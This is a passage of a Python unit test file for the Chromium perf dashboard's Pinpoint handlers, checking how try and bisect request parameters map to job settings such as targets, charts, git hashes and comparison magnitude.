                     mock.MagicMock(return_value=True))
  @mock.patch.object(pinpoint_service, 'NewJob')
  @mock.patch.object(pinpoint_request, 'PinpointParamsFromPerfTryParams',
                     mock.MagicMock(return_value={'test': 'result'}))
  def testPost_Succeeds(self, mock_pinpoint):
    # mock_pinpoint is the NewJob mock; patches that pass an explicit ``new``
    # (the MagicMocks above) do not inject an argument.
    mock_pinpoint.return_value = {'foo': 'bar'}
    self.SetCurrentUser('foo@chromium.org')
    params = {'a': 'b', 'c': 'd'}
    response = self.testapp.post('/pinpoint/new', params)
    # NewJob must be called with the translated params, and its response is
    # echoed back verbatim.
    expected_args = mock.call({'test': 'result'})
    self.assertEqual([expected_args], mock_pinpoint.call_args_list)
    self.assertEqual({'foo': 'bar'}, json.loads(response.body))

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_StoryFilterSet(self):
    params = GenerateTryRequestParams({
        'test_path': 'ChromiumPerf/android-webview-nexus5x/system_health/foo',
        'story_filter': 'story',
    })
    results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
    self.assertEqual('story', results['story'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_ComparisonMode_Try(self):
    # Perf-try jobs always use the 'try' comparison mode.
    params = GenerateTryRequestParams({
        'test_path': 'ChromiumPerf/android-webview-nexus5x/system_health/foo',
        'story_filter': 'required',
    })
    results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
    self.assertEqual('try', results['comparison_mode'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=False))
  def testPinpointParams_InvalidSheriff_RaisesError(self):
    params = {
        'test_path': 'ChromiumPerf/foo/blah/foo',
        'story_filter': 'required',
    }
    with self.assertRaises(pinpoint_request.InvalidParamsError):
      pinpoint_request.PinpointParamsFromPerfTryParams(params)

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_IsolateTarget_VRTests(self):
    # xr.* benchmarks map to the vr_perf_tests isolate target.
    params = GenerateTryRequestParams({
        'test_path': 'ChromiumPerf/mac/xr.static.foo/foo',
        'extra_test_args': json.dumps(['--extra-trace-args', 'abc,123,foo']),
        'story_filter': 'required',
    })
    results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
    self.assertEqual('vr_perf_tests', results['target'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_IsolateTarget_Telemetry(self):
    params = GenerateTryRequestParams({
        'test_path': 'ChromiumPerf/mac/system_health/foo',
        'extra_test_args': json.dumps(['--extra-trace-args', 'abc,123,foo']),
        'story_filter': 'required',
    })
    results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
    self.assertEqual('mac', results['configuration'])
    self.assertEqual('system_health', results['benchmark'])
    self.assertEqual('performance_test_suite', results['target'])
    self.assertEqual('foo@chromium.org', results['user'])
    self.assertEqual('abcd1234', results['base_git_hash'])
    self.assertEqual('efgh5678', results['end_git_hash'])
    self.assertEqual(['--extra-trace-args', 'abc,123,foo'],
                     json.loads(results['extra_test_args']))

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_IsolateTarget_WebviewTelemetry(self):
    # WebView bots map to the performance_webview_test_suite target.
    params = GenerateTryRequestParams({
        'test_path':
            'ChromiumPerf/Android Nexus5X WebView Perf/system_health/foo',
        'story_filter':
            'required',
    })
    results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
    self.assertEqual('Android Nexus5X WebView Perf', results['configuration'])
    self.assertEqual('system_health', results['benchmark'])
    self.assertEqual('performance_webview_test_suite', results['target'])
    self.assertEqual('foo@chromium.org', results['user'])
    self.assertEqual('abcd1234', results['base_git_hash'])
    self.assertEqual('efgh5678', results['end_git_hash'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_IsolateTarget_LacrosEve(self):
    # lacros-eve bots map to the performance_test_suite_eve target.
    params = GenerateTryRequestParams({
        'test_path': 'ChromiumPerf/lacros-eve-perf/system_health/foo',
        'story_filter': 'required',
    })
    results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
    self.assertEqual('lacros-eve-perf', results['configuration'])
    self.assertEqual('system_health', results['benchmark'])
    self.assertEqual('performance_test_suite_eve', results['target'])
    self.assertEqual('foo@chromium.org', results['user'])
    self.assertEqual('abcd1234', results['base_git_hash'])
    self.assertEqual('efgh5678', results['end_git_hash'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_IsolateTarget_FuchsiaPerf_WebEngine(self):
    # Fuchsia bots map to the performance_web_engine_test_suite target.
    params = GenerateTryRequestParams({
        'test_path': 'ChromiumPerf/fuchsia-perf-fyi/system_health/foo',
        'story_filter': 'required',
    })
    results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
    self.assertEqual('fuchsia-perf-fyi', results['configuration'])
    self.assertEqual('system_health', results['benchmark'])
    self.assertEqual('performance_web_engine_test_suite', results['target'])
    self.assertEqual('foo@chromium.org', results['user'])
    self.assertEqual('abcd1234', results['base_git_hash'])
    self.assertEqual('efgh5678', results['end_git_hash'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  @mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering',
                     mock.MagicMock(return_value={'git_sha': 'abcd'}))
  def testPinpointParams_ConvertsCommitsToGitHashes(self):
    # Numeric commit positions are resolved to git hashes via crrev.
    params = GenerateTryRequestParams({
        'test_path': 'ChromiumPerf/android-webview-nexus5x/system_health/foo',
        'start_commit': '1234',
        'end_commit': '5678',
        'story_filter': 'required',
    })
    results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
    self.assertEqual('abcd', results['base_git_hash'])
    self.assertEqual('abcd', results['end_git_hash'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  @mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering')
  def testPinpointParams_SkipsConvertingHashes(self, mock_crrev):
    # Inputs that already look like git hashes bypass the crrev lookup.
    params = GenerateTryRequestParams({
        'test_path': 'ChromiumPerf/android-webview-nexus5x/system_health/foo',
        'story_filter': 'required',
    })
    results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
    self.assertEqual('abcd1234', results['base_git_hash'])
    self.assertEqual('efgh5678', results['end_git_hash'])
    self.assertFalse(mock_crrev.called)

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  @mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering')
  def testPinpointParams_V8(self, mock_crrev):
    # V8 test paths produce an empty target and resolve commit positions
    # against the v8/v8 repository.
    mock_crrev.return_value = {'git_sha': 'acbd'}
    params = GenerateTryRequestParams({
        'test_path': 'internal.client.v8/Pixel2/v8/JSTests/Array/Total',
        'start_commit': '1234',
        'end_commit': '5678',
        'story_filter': 'required',
    })
    results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
    self.assertEqual('', results['target'])
    mock_crrev.assert_any_call(
        number='1234',
        numbering_identifier='refs/heads/main',
        numbering_type='COMMIT_POSITION',
        project='chromium',
        repo='v8/v8')
# Magnitude estimation is exercised separately in
# PinpointNewBisectComparisonMagnitude; stub it out for this class.
@mock.patch.object(pinpoint_request, 'FindMagnitudeBetweenCommits',
                   mock.MagicMock(return_value=None))
class PinpointNewBisectRequestHandlerTest(testing_common.TestCase):
  """Tests for the bisect flavour of the /pinpoint/new handler.

  Covers the HTTP handler (including alert bookkeeping) and the
  PinpointParamsFromBisectParams() translation helper: target/benchmark
  derivation, chart/trace/grouping-label parsing, bisect modes, statistic
  splitting, pins, and commit-position -> git-hash conversion.
  """

  def setUp(self):
    super(PinpointNewBisectRequestHandlerTest, self).setUp()
    app = webapp2.WSGIApplication([
        (r'/pinpoint/new', pinpoint_request.PinpointNewBisectRequestHandler)
    ])
    self.testapp = webtest.TestApp(app)
    self.SetCurrentUser('foo@chromium.org')
    # The params helper resolves repository names via this stored object.
    namespaced_stored_object.Set('repositories', {
        'chromium': {
            'some': 'params'
        },
        'v8': {
            'more': 'params'
        }
    })

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=False))
  def testPost_NotSheriff(self):
    response = self.testapp.post('/pinpoint/new')
    self.assertEqual({u'error': u'User "foo@chromium.org" not authorized.'},
                     json.loads(response.body))

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  @mock.patch.object(pinpoint_service, 'NewJob')
  @mock.patch.object(pinpoint_request, 'PinpointParamsFromBisectParams',
                     mock.MagicMock(return_value={'test': 'result'}))
  def testPost_NewJob_Fails(self, mock_pinpoint):
    # mock_pinpoint is the NewJob mock; patches that pass an explicit ``new``
    # do not inject an argument.  Pinpoint errors are relayed to the caller.
    mock_pinpoint.return_value = {'error': 'something'}
    self.SetCurrentUser('foo@chromium.org')
    params = {'a': 'b', 'c': 'd'}
    response = self.testapp.post('/pinpoint/new', params)
    expected_args = mock.call({'test': 'result'})
    self.assertEqual([expected_args], mock_pinpoint.call_args_list)
    self.assertEqual({'error': 'something'}, json.loads(response.body))

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  @mock.patch.object(pinpoint_service, 'NewJob')
  @mock.patch.object(pinpoint_request, 'PinpointParamsFromBisectParams',
                     mock.MagicMock(return_value={'test': 'result'}))
  def testPost_Succeeds(self, mock_pinpoint):
    mock_pinpoint.return_value = {'foo': 'bar'}
    self.SetCurrentUser('foo@chromium.org')
    params = {'a': 'b', 'c': 'd'}
    response = self.testapp.post('/pinpoint/new', params)
    expected_args = mock.call({'test': 'result'})
    self.assertEqual([expected_args], mock_pinpoint.call_args_list)
    self.assertEqual({'foo': 'bar'}, json.loads(response.body))

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=False))
  def testPinpointParams_InvalidSheriff_RaisesError(self):
    params = {'test_path': 'ChromiumPerf/foo/blah/foo'}
    with self.assertRaises(pinpoint_request.InvalidParamsError):
      pinpoint_request.PinpointParamsFromBisectParams(params)

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  @mock.patch.object(pinpoint_service, 'NewJob')
  @mock.patch.object(pinpoint_request, 'PinpointParamsFromBisectParams',
                     mock.MagicMock(return_value={'test': 'result'}))
  def testPost_Succeeds_AddsToAlert(self, mock_pinpoint):
    # On success the new job id is recorded on the referenced anomaly.
    mock_pinpoint.return_value = {'jobId': 'bar'}
    self.SetCurrentUser('foo@chromium.org')
    test_key = utils.TestKey('M/B/S/foo')
    anomaly_entity = anomaly.Anomaly(
        start_revision=1, end_revision=2, test=test_key)
    anomaly_entity.put()
    params = {
        'a': 'b',
        'c': 'd',
        'alerts': json.dumps([anomaly_entity.key.urlsafe()])
    }
    response = self.testapp.post('/pinpoint/new', params)
    expected_args = mock.call({'test': 'result'})
    self.assertEqual([expected_args], mock_pinpoint.call_args_list)
    self.assertEqual({'jobId': 'bar'}, json.loads(response.body))
    self.assertEqual(['bar'], anomaly_entity.pinpoint_bisects)

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  @mock.patch.object(pinpoint_service, 'NewJob')
  @mock.patch.object(pinpoint_request, 'PinpointParamsFromBisectParams',
                     mock.MagicMock(return_value={'test': 'result'}))
  def testPost_Fails_AddsToAlert(self, mock_pinpoint):
    # On failure the anomaly must NOT be tagged with a job id.
    mock_pinpoint.return_value = {'error': 'bar'}
    self.SetCurrentUser('foo@chromium.org')
    test_key = utils.TestKey('M/B/S/foo')
    anomaly_entity = anomaly.Anomaly(
        start_revision=1, end_revision=2, test=test_key)
    anomaly_entity.put()
    params = {
        'a': 'b',
        'c': 'd',
        'alerts': json.dumps([anomaly_entity.key.urlsafe()])
    }
    response = self.testapp.post('/pinpoint/new', params)
    expected_args = mock.call({'test': 'result'})
    self.assertEqual([expected_args], mock_pinpoint.call_args_list)
    self.assertEqual({'error': 'bar'}, json.loads(response.body))
    self.assertEqual([], anomaly_entity.pinpoint_bisects)

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_ComparisonMagnitude_Added(self):
    # When an alert is supplied, the medians around the anomaly give the
    # comparison magnitude (10 - 1 = 9) and the alert key is tagged.
    test_key = utils.TestKey('ChromiumPerf/mac/cc_perftests/foo')
    testing_common.AddTests(['ChromiumPerf'], ['mac'],
                            {'cc_perftests': {
                                'foo': {}
                            }})
    anomaly_entity = anomaly.Anomaly(
        start_revision=1,
        end_revision=2,
        test=test_key,
        median_before_anomaly=1,
        median_after_anomaly=10)
    anomaly_entity.put()
    params = GenerateBisectRequestParams({
        'test_path': 'ChromiumPerf/mac/cc_perftests/foo',
        'story_filter': 'required',
        'alerts': json.dumps([anomaly_entity.key.urlsafe()])
    })
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    self.assertEqual(9, results['comparison_magnitude'])
    self.assertEqual(anomaly_entity.key.urlsafe(),
                     json.loads(results['tags'])['alert'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_IsolateTarget_NonTelemetry(self):
    # Non-telemetry suites (e.g. cc_perftests) carry no isolate target key.
    testing_common.AddTests(['ChromiumPerf'], ['mac'],
                            {'cc_perftests': {
                                'foo': {}
                            }})
    params = GenerateBisectRequestParams({
        'test_path': 'ChromiumPerf/mac/cc_perftests/foo',
        'story_filter': 'required',
    })
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    self.assertEqual('mac', results['configuration'])
    self.assertEqual('cc_perftests', results['benchmark'])
    self.assertEqual('foo', results['chart'])
    self.assertEqual('foo@chromium.org', results['user'])
    self.assertEqual('abcd1234', results['start_git_hash'])
    self.assertEqual('efgh5678', results['end_git_hash'])
    self.assertEqual('performance', results['comparison_mode'])
    self.assertEqual(1, results['bug_id'])
    self.assertEqual(params['test_path'],
                     json.loads(results['tags'])['test_path'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_IsolateTarget_Telemetry(self):
    testing_common.AddTests(['ChromiumPerf'], ['mac'],
                            {'system_health': {
                                'foo': {}
                            }})
    params = GenerateBisectRequestParams({
        'test_path': 'ChromiumPerf/mac/system_health/foo',
        'story_filter': 'foo',
    })
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    self.assertEqual('mac', results['configuration'])
    self.assertEqual('system_health', results['benchmark'])
    self.assertEqual('foo', results['chart'])
    self.assertEqual('performance_test_suite', results['target'])
    self.assertEqual('foo@chromium.org', results['user'])
    self.assertEqual('abcd1234', results['start_git_hash'])
    self.assertEqual('efgh5678', results['end_git_hash'])
    self.assertEqual('performance', results['comparison_mode'])
    self.assertEqual(1, results['bug_id'])
    self.assertEqual('foo', results['story'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_IsolateTarget_WebviewTelemetry(self):
    testing_common.AddTests(['ChromiumPerf'], ['Android Nexus5X WebView Perf'],
                            {'system_health': {
                                'foo': {}
                            }})
    params = GenerateBisectRequestParams({
        'test_path':
            'ChromiumPerf/Android Nexus5X WebView Perf/system_health/foo',
        'story_filter':
            'required',
    })
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    self.assertEqual('Android Nexus5X WebView Perf', results['configuration'])
    self.assertEqual('system_health', results['benchmark'])
    self.assertEqual('foo', results['chart'])
    self.assertEqual('performance_webview_test_suite', results['target'])
    self.assertEqual('foo@chromium.org', results['user'])
    self.assertEqual('abcd1234', results['start_git_hash'])
    self.assertEqual('efgh5678', results['end_git_hash'])
    self.assertEqual('performance', results['comparison_mode'])
    self.assertEqual(1, results['bug_id'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_IsolateTarget_LacrosEve(self):
    testing_common.AddTests(['ChromiumPerf'], ['lacros-eve-perf'],
                            {'system_health': {
                                'foo': {}
                            }})
    params = GenerateBisectRequestParams({
        'test_path': 'ChromiumPerf/lacros-eve-perf/system_health/foo',
        'story_filter': 'required',
    })
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    self.assertEqual('lacros-eve-perf', results['configuration'])
    self.assertEqual('system_health', results['benchmark'])
    self.assertEqual('foo', results['chart'])
    self.assertEqual('performance_test_suite_eve', results['target'])
    self.assertEqual('foo@chromium.org', results['user'])
    self.assertEqual('abcd1234', results['start_git_hash'])
    self.assertEqual('efgh5678', results['end_git_hash'])
    self.assertEqual('performance', results['comparison_mode'])
    self.assertEqual(1, results['bug_id'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_IsolateTarget_FuchsiaPerf_WebEngine(self):
    testing_common.AddTests(['ChromiumPerf'], ['fuchsia-perf-fyi'],
                            {'system_health': {
                                'foo': {}
                            }})
    params = GenerateBisectRequestParams({
        'test_path': 'ChromiumPerf/fuchsia-perf-fyi/system_health/foo',
        'story_filter': 'required',
    })
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    self.assertEqual('fuchsia-perf-fyi', results['configuration'])
    self.assertEqual('system_health', results['benchmark'])
    self.assertEqual('foo', results['chart'])
    self.assertEqual('performance_web_engine_test_suite', results['target'])
    self.assertEqual('foo@chromium.org', results['user'])
    self.assertEqual('abcd1234', results['start_git_hash'])
    self.assertEqual('efgh5678', results['end_git_hash'])
    self.assertEqual('performance', results['comparison_mode'])
    self.assertEqual(1, results['bug_id'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_Metric_TopLevelOnly(self):
    # A 4-part test path yields only a chart, no trace.
    testing_common.AddTests(['ChromiumPerf'], ['mac'],
                            {'blink_perf': {
                                'foo': {}
                            }})
    params = GenerateBisectRequestParams({
        'test_path': 'ChromiumPerf/mac/blink_perf/foo',
        'story_filter': 'required',
    })
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    self.assertEqual('foo', results['chart'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_Metric_ChartAndTrace(self):
    # A 5-part path yields chart + trace; the trace comes from the
    # unescaped story name when one is stored.
    testing_common.AddTests(['ChromiumPerf'], ['mac'],
                            {'blink_perf': {
                                'foo': {
                                    'http___bar.html': {}
                                }
                            }})
    params = GenerateBisectRequestParams({
        'test_path': 'ChromiumPerf/mac/blink_perf/foo/http___bar.html',
        'story_filter': 'required',
    })
    t = graph_data.TestMetadata(
        id=params['test_path'], unescaped_story_name='http://bar.html')
    t.UpdateSheriff()
    t.put()
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    self.assertEqual('foo', results['chart'])
    self.assertEqual('http://bar.html', results['trace'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_Metric_GroupingLabelChartAndTrace(self):
    # A 6-part path yields grouping label + chart + trace.
    testing_common.AddTests(
        ['ChromiumPerf'], ['mac'],
        {'blink_perf': {
            'foo': {
                'label': {
                    'bar.html': {}
                }
            }
        }})
    params = GenerateBisectRequestParams({
        'test_path': 'ChromiumPerf/mac/blink_perf/foo/label/bar.html',
        'story_filter': 'required',
    })
    t = graph_data.TestMetadata(id=params['test_path'],)
    t.UpdateSheriff()
    t.put()
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    self.assertEqual('label', results['grouping_label'])
    self.assertEqual('foo', results['chart'])
    self.assertEqual('bar.html', results['trace'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_BisectMode_Invalid_RaisesError(self):
    params = GenerateBisectRequestParams({
        'test_path': 'ChromiumPerf/mac/blink_perf/foo/label/bar.html',
        'bisect_mode': 'foo',
        'story_filter': 'required',
    })
    t = graph_data.TestMetadata(id=params['test_path'],)
    t.UpdateSheriff()
    t.put()
    with self.assertRaises(pinpoint_request.InvalidParamsError):
      pinpoint_request.PinpointParamsFromBisectParams(params)

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_BisectMode_Functional(self):
    params = GenerateBisectRequestParams({
        'test_path': 'ChromiumPerf/mac/blink_perf/foo/label/bar.html',
        'bisect_mode': 'functional',
        'story_filter': 'required',
    })
    t = graph_data.TestMetadata(id=params['test_path'],)
    t.UpdateSheriff()
    t.put()
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    self.assertEqual('functional', results['comparison_mode'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  @mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering',
                     mock.MagicMock(return_value={'git_sha': 'abcd'}))
  def testPinpointParams_ConvertsCommitsToGitHashes(self):
    # Numeric commit positions are resolved to git hashes via crrev.
    testing_common.AddTests(['ChromiumPerf'], ['android-webview-nexus5x'],
                            {'system_health': {
                                'foo': {}
                            }})
    params = GenerateBisectRequestParams({
        'test_path': 'ChromiumPerf/android-webview-nexus5x/system_health/foo',
        'start_commit': '1234',
        'end_commit': '5678',
        'story_filter': 'required',
    })
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    self.assertEqual('abcd', results['start_git_hash'])
    self.assertEqual('abcd', results['end_git_hash'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  @mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering')
  def testPinpointParams_SkipsConvertingHashes(self, mock_crrev):
    # Inputs that already look like git hashes bypass the crrev lookup.
    testing_common.AddTests(['ChromiumPerf'], ['android-webview-nexus5x'],
                            {'system_health': {
                                'foo': {}
                            }})
    params = GenerateBisectRequestParams({
        'test_path': 'ChromiumPerf/android-webview-nexus5x/system_health/foo',
        'bug_id': '',
        'story_filter': 'required',
    })
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    self.assertEqual('abcd1234', results['start_git_hash'])
    self.assertEqual('efgh5678', results['end_git_hash'])
    self.assertFalse(mock_crrev.called)

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_SplitsStatistics(self):
    # A trailing statistic suffix (foo_avg, foo_max, ...) is split off the
    # chart name into a separate 'statistic' field.
    statistic_types = ['avg', 'min', 'max', 'sum', 'std', 'count']
    for s in statistic_types:
      testing_common.AddTests(['ChromiumPerf'], ['mac'],
                              {'system_health': {
                                  'foo_%s' % s: {}
                              }})
      params = GenerateBisectRequestParams({
          'test_path': 'ChromiumPerf/mac/system_health/foo_%s' % s,
          'story_filter': 'required',
          'bug_id': -1,
      })
      results = pinpoint_request.PinpointParamsFromBisectParams(params)
      self.assertEqual(s, results['statistic'])
      self.assertEqual('foo', results['chart'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_WithPin(self):
    # A patch pin is passed through untouched.
    testing_common.AddTests(['ChromiumPerf'], ['android-webview-nexus5x'],
                            {'system_health': {
                                'foo': {}
                            }})
    params = GenerateBisectRequestParams({
        'test_path': 'ChromiumPerf/android-webview-nexus5x/system_health/foo',
        'story_filter': 'required',
        'pin': 'https://path/to/patch',
    })
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    self.assertEqual('https://path/to/patch', results['pin'])

  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  @mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering')
  def testPinpointParams_V8(self, mock_crrev):
    # V8 paths: no grouping label/trace keys, empty chart and target, and
    # commit positions resolved against the v8/v8 repository.
    mock_crrev.return_value = {'git_sha': 'acbd'}
    testing_common.AddTests(['internal.client.v8'], ['Pixel2'],
                            {'v8': {
                                'JSTests': {
                                    'Array': {
                                        'Total': {}
                                    }
                                }
                            }})
    params = GenerateBisectRequestParams({
        'test_path': 'internal.client.v8/Pixel2/v8/JSTests/Array/Total',
        'start_commit': '1234',
        'end_commit': '5678',
        'story_filter': 'required',
        'pin': 'https://path/to/patch',
    })
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    self.assertNotIn('grouping_label', results)
    self.assertNotIn('trace', results)
    self.assertEqual('', results['chart'])
    self.assertEqual('', results['target'])
    mock_crrev.assert_any_call(
        number='1234',
        numbering_identifier='refs/heads/main',
        numbering_type='COMMIT_POSITION',
        project='chromium',
        repo='v8/v8')
class PinpointNewBisectComparisonMagnitude(testing_common.TestCase):
  """Tests for comparison_magnitude estimation in bisect param translation.

  Each test seeds two plateaus of row data (values 0.1 then 0.5) around the
  bisect range and checks whether the 0.4 step is reported as the
  comparison magnitude.
  """

  def setUp(self):
    super(PinpointNewBisectComparisonMagnitude, self).setUp()
    self.SetCurrentUser('foo@chromium.org')
    namespaced_stored_object.Set('repositories', {
        'chromium': {
            'some': 'params'
        },
        'v8': {
            'more': 'params'
        }
    })

  @mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering',
                     mock.MagicMock(return_value={'git_sha': 'abcd'}))
  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_NoAlert(self):
    # Without an alert, the magnitude is derived from row data around the
    # commit range.
    testing_common.AddTests(['ChromiumPerf'], ['Android Nexus5X WebView Perf'],
                            {'system_health': {
                                'foo': {}
                            }})
    params = GenerateBisectRequestParams({
        'test_path':
            'ChromiumPerf/Android Nexus5X WebView Perf/system_health/foo',
        'start_commit':
            '1051',
        'end_commit':
            '1151',
        'story_filter':
            'required',
    })
    t = graph_data.TestMetadata(id=params['test_path'])
    t.put()
    # 50 rows at 0.1 (revisions 1000, 1002, ...) then 50 rows at 0.5
    # (1101, 1103, ...).  NOTE: itertools.repeat() yields the *same* dict
    # object for every row.
    rows = dict(
        itertools.chain(
            list(
                zip(
                    itertools.islice(itertools.count(1000, 2), 50),
                    itertools.repeat({'value': 0.1}))),
            list(
                zip(
                    itertools.islice(itertools.count(1101, 2), 50),
                    itertools.repeat({'value': 0.5})))))
    testing_common.AddRows(params['test_path'], rows)
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    self.assertEqual(0.4, results['comparison_magnitude'])

  @mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering',
                     mock.MagicMock(return_value={'git_sha': 'abcd'}))
  @mock.patch.object(pinpoint_request.crrev_service, 'GetCommit')
  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_GitHashes(self, mock_commit):
    # Git-hash inputs are mapped back to commit positions (via GetCommit)
    # before the row data is examined.
    def _MockCommit(git_sha):
      if git_sha == 'abc':
        return {'number': 1050}
      return {'number': 1150}

    mock_commit.side_effect = _MockCommit
    testing_common.AddTests(['ChromiumPerf'], ['Android Nexus5X WebView Perf'],
                            {'system_health': {
                                'foo': {}
                            }})
    params = GenerateBisectRequestParams({
        'test_path':
            'ChromiumPerf/Android Nexus5X WebView Perf/system_health/foo',
        'start_commit':
            'abc',
        'end_commit':
            'def',
        'story_filter':
            'required',
    })
    t = graph_data.TestMetadata(id=params['test_path'])
    t.put()
    rows = dict(
        itertools.chain(
            list(
                zip(
                    itertools.islice(itertools.count(1000, 2), 50),
                    itertools.repeat({'value': 0.1}))),
            list(
                zip(
                    itertools.islice(itertools.count(1101, 2), 50),
                    itertools.repeat({'value': 0.5})))))
    testing_common.AddRows(params['test_path'], rows)
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    self.assertEqual(0.4, results['comparison_magnitude'])

  @mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering',
                     mock.MagicMock(return_value={'git_sha': 'abcd'}))
  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_NoData(self):
    # With no rows at all, no comparison_magnitude is emitted.
    testing_common.AddTests(['ChromiumPerf'], ['Android Nexus5X WebView Perf'],
                            {'system_health': {
                                'foo': {}
                            }})
    params = GenerateBisectRequestParams({
        'test_path':
            'ChromiumPerf/Android Nexus5X WebView Perf/system_health/foo',
        'start_commit':
            '1050',
        'end_commit':
            '1150',
        'story_filter':
            'required',
    })
    t = graph_data.TestMetadata(id=params['test_path'])
    t.put()
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    self.assertFalse('comparison_magnitude' in results)

  @mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering',
                     mock.MagicMock(return_value={'git_sha': 'abcd'}))
  @mock.patch.object(utils, 'IsValidSheriffUser',
                     mock.MagicMock(return_value=True))
  def testPinpointParams_OverriddenAnomalyConfig(self):
    # An overridden anomaly config (min_segment_size=1) shrinks the window
    # so the single 0.1 row at 1050 anchors the "before" side.
    testing_common.AddTests(['ChromiumPerf'], ['Android Nexus5X WebView Perf'],
                            {'system_health': {
                                'foo': {}
                            }})
    params = GenerateBisectRequestParams({
        'test_path':
            'ChromiumPerf/Android Nexus5X WebView Perf/system_health/foo',
        'start_commit':
            '1051',
        'end_commit':
            '1151',
        'story_filter':
            'required',
    })
    a = anomaly_config.AnomalyConfig()
    a.config = {'min_segment_size': 1}
    a.patterns = ['*/*/*/*']
    a.put()
    t = graph_data.TestMetadata(id=params['test_path'])
    t.overridden_anomaly_config = a.key
    t.put()
    rows = dict(
        itertools.chain(
            list(
                zip(
                    itertools.islice(itertools.count(1000, 2), 75),
                    itertools.repeat({'value': -100.0}))), [(1050, {
                        'value': 0.1
                    })],
            list(
                zip(
